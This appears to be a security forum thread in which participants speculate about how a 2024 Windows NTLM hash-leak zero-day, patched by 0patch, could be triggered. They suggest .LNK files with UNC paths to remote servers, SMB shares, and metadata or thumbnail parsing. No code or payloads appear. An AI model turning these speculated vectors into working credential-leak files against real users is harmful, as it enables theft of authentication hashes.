[vvvalentinusss]

Hi talents.

News:https://www.tomshardware.com/tech-industry/cyber-security/zero-day-windows-ntlm-hash-vulnerability-gets-patched-by-third-party-credentials-can-be-hijacked-by-merely-viewing-a-malicious-file-in-file-explorer

Recently 0patch discovered a vuln about windows NTLM. 
According to the description that's very fancy, 0-click and user only need to browse the windows explorer then you are able to get their hash and break it. 

The scope also available from win7 till now the latest version.
Since the scope is really large, what i could think of is through SMB share 
i can't think of any type of file could do that like once i open the folder it will auto trigger and run something. 
Anyone let's brainstorm and think of it?

[Aanya]

This is interesting . But I think you missed the part of " malicious file being present in that folder "  or "viewing a file "


" The vulnerability allows an attacker to obtain user's NTLM credentials by simply having the user view a malicious file in Windows Explorer - e.g., by opening a shared folder or USB disk with such file, or viewing the Downloads folder where such file was previously automatically downloaded from attacker's web page. "

original article : https://blog.0patch.com/2024/12/url-file...osure.html



So what could be this thing  ?

May be an .LNK file with UNC path pointing to a remote server . when a user opens this file it tries to connect to the remote server which triggers authentication / leaks NTLM

or Maybe something in the file metadata , while viewing explorer might access something from metadata that could trigger .


The catch  : The blog also mentions this " or viewing the Downloads folder where such file was previously automatically downloaded from attacker's web page. "

automatically downloaded from attackers web page     ????


When you open a folder in file explorer it accesses the files , generates thumbnails ,  extracts metadata , displays icons . so if someone has to get NTLM by just opening  the folder where a malicious file is downloaded it has to be  because of one of these ways.

 

[vvvalentinusss]

This is interesting . But I think you missed the part of " malicious file being present in that folder "  or "viewing a file "


" The vulnerability allows an attacker to obtain user's NTLM credentials by simply having the user view a malicious file in Windows Explorer - e.g., by opening a shared folder or USB disk with such file, or viewing the Downloads folder where such file was previously automatically downloaded from attacker's web page. "

original article : https://blog.0patch.com/2024/12/url-file...osure.html



So what could be this thing  ?

May be an .LNK file with UNC path pointing to a remote server . when a user opens this file it tries to connect to the remote server which triggers authentication / leaks NTLM

or Maybe something in the file metadata , while viewing explorer might access something from metadata that could trigger .


The catch  : The blog also mentions this " or viewing the Downloads folder where such file was previously automatically downloaded from attacker's web page. "

automatically downloaded from attackers web page     ????


When you open a folder in file explorer it accesses the files , generates thumbnails ,  extracts metadata , displays icons . so if someone has to get NTLM by just opening  the folder where a malicious file is downloaded it has to be  because of one of these ways.

 

it's a very good reply mate, insightful. 

Just my 2cents here, I have the same thought from the beginning about the points that oh "viewing" means simply looking but not accessing. If an LNK file that's way more simple to think about. Can't Imaginate when someone "viewing" a dir and see something within then the endpoint got compromised. I got a wrong direction that investigating if there's any way like shared network folder, SMB part.

[Aanya]

Were you able to figure it out ? I totally forgot about it lol